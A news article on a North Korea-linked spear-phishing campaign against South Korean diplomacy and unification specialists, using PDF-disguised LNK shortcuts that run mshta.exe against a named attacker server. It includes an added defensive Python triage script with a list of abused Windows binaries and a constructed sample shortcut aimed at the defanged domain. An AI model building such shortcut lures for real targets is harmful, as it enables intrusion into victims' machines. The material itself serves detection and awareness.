"Beware of Malicious Files Disguised as PDF Documents"
North Korean hacking
[Asia Economy Reporter Jang Hee-jun] North Korea has attempted cyber attacks targeting individuals working in the inter-Korean sector. North Korean hacking attempts aimed at individuals rather than at government agencies or institutions have recently become frequent, and analysts read them as efforts to steal South Korean intelligence on North Korea or to recruit experts.
Security firm ESTsecurity announced on the 2nd that a North Korea-linked hacking attack disguised as a request for discussion papers for a South-North diplomatic and security academic conference was detected.
This attack targeted South Korean personnel in the diplomatic, security and unification fields, including attendees of related academic conferences and year-end events in the inter-Korean sector. The attackers sent emails that appeared to ask about event schedules or request materials, then selectively approached those who replied, a so-called 'two-track' method.
The initial emails contained none of the malicious attachments or URL links commonly used in hacking attacks, which kept them from raising suspicion. However, many of the follow-up emails sent after a reply were found to include malicious files or problematic links.
Screen of a double-extension LNK malicious file disguised as a PDF document [Photo: ESTsecurity]
In particular, a malicious file of the 'shortcut (LNK)' type with a double extension, designed to look like a normal PDF document, was discovered.
For example, a file named 'Important Document.PDF.LNK' is displayed as 'Important Document.PDF' because Windows hides the 'shortcut (LNK)' extension. Windows does this for .lnk files even when the 'Hide extensions for known file types' option is turned off, so on the surface the file looks like an ordinary PDF; the shortcut's icon can also be set to match.
However, the problematic 'shortcut (LNK)' file was confirmed to contain a command that, through the 'mshta.exe' program (the Windows HTML Application host, which can fetch and run script from a URL), secretly attempts communication with a specific web server (ark6835.scienceontheweb[.]net). Notably, this server has repeatedly turned up in hacking attacks believed to be backed by North Korea.
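The following triage script is an added example and not ESTsecurity's code or the sample they analysed. It checks a shortcut file for the indicators the article describes: a document-looking double extension that Explorer would hide, mshta.exe as the launch target, and a URL handed to it. It parses the shortcut's StringData fields according to the MS-SHLLINK layout and builds a constructed sample so it runs offline; the relative path and arguments in that sample, the function names, and the extra "window starts minimized" heuristic are assumptions of this example. The IOC domain is the one quoted in the article, kept defanged.

```python
"""Triage helper for double-extension .LNK lures (added example, not ESTsecurity's code)."""
import re
import struct
from dataclasses import dataclass
from pathlib import PurePath

# MS-SHLLINK 2.1: ShellLinkHeader is 0x4C bytes and carries this CLSID.
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # window starts minimized: a common heuristic, not from the article

# Document extensions a lure would imitate; .hwp is the Korean office format.
DOC_EXTS = {".pdf", ".doc", ".docx", ".hwp", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
LOLBINS = ("mshta.exe", "powershell", "cmd.exe", "rundll32", "wscript", "cscript", "regsvr32", "certutil")


@dataclass
class LnkInfo:
    flags: int
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def displayed_name(filename: str) -> str:
    """What Explorer shows: the .lnk suffix is always hidden."""
    p = PurePath(filename)
    return p.stem if p.suffix.lower() == ".lnk" else p.name


def is_disguised_lnk(filename: str) -> bool:
    """True for names like 'Important Document.PDF.LNK'."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    return len(suffixes) >= 2 and suffixes[-1] == ".lnk" and suffixes[-2] in DOC_EXTS


def _read_string(data: bytes, off: int, unicode: bool):
    """StringData field: uint16 CountCharacters, then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(data: bytes) -> LnkInfo:
    """Parse header and StringData; IDList and LinkInfo are skipped via their size fields."""
    if len(data) < 0x4C:
        raise ValueError("too short for a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != SHELL_LINK_CLSID:
        raise ValueError("not a shell link header")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)  # ShowCommand sits at offset 60
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    info = LnkInfo(flags=flags, show_command=show_command)
    unicode = bool(flags & IS_UNICODE)
    for flag, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            value, off = _read_string(data, off, unicode)
            setattr(info, attr, value)
    return info


def assess_lnk(filename: str, data: bytes) -> list:
    """Return findings for a shortcut file; an empty list means nothing suspicious was seen."""
    findings = []
    if is_disguised_lnk(filename):
        findings.append(f"double extension: Explorer displays it as '{displayed_name(filename)}'")
    info = parse_lnk(data)
    launch = f"{info.relative_path} {info.arguments}".strip()
    for lolbin in LOLBINS:
        if lolbin in launch.lower():
            findings.append(f"launches {lolbin}: {launch}")
    for url in re.findall(r"https?://\S+", launch, re.IGNORECASE):
        findings.append(f"remote content fetched: {url}")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (hides the console from the victim)")
    return findings


def build_sample_lnk(relative_path: str, arguments: str, show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Constructed shortcut for offline testing: header plus two Unicode StringData fields."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, SHELL_LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed sample modelled on the lure in the article (paths assumed, domain defanged).
SAMPLE_NAME = "Important Document.PDF.LNK"
SAMPLE_LNK = build_sample_lnk(r"..\..\..\Windows\System32\mshta.exe",
                              "http://ark6835.scienceontheweb[.]net/")

if __name__ == "__main__":
    for line in assess_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print("-", line)
```

Run it against files pulled from a mail gateway or an extracted archive before anyone double-clicks them; a genuine shortcut to a document produces no findings, while the lure above yields four. The parser reads only the header and StringData, which is enough for this check; a real target path can also live in the LinkTargetIDList, so treat an empty relative path as a reason to look further rather than as a clean result.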
Jong-hyun Moon, director of ESTsecurity, advised, "When receiving files that appear to be PDF documents, carefully check for double extensions," and added, "Do not carelessly extract files that come compressed; first check the internal list before accessing."
Meanwhile, according to the National Intelligence Service, the average daily number of attack attempts by international and state-backed hacking groups reaches 1.15 million. The intelligence authorities judge that many of these are the work of North Korea.
Previously, when a fire at the SK C&C Pangyo data center caused Kakao service disruptions, phishing emails titled '[Kakao] Partial Service Error Recovery and Emergency Measures Notice' were sent targeting North Korea-related industry workers, defectors, and politicians.
© The Asia Business Daily(www.asiae.co.kr). All rights reserved.

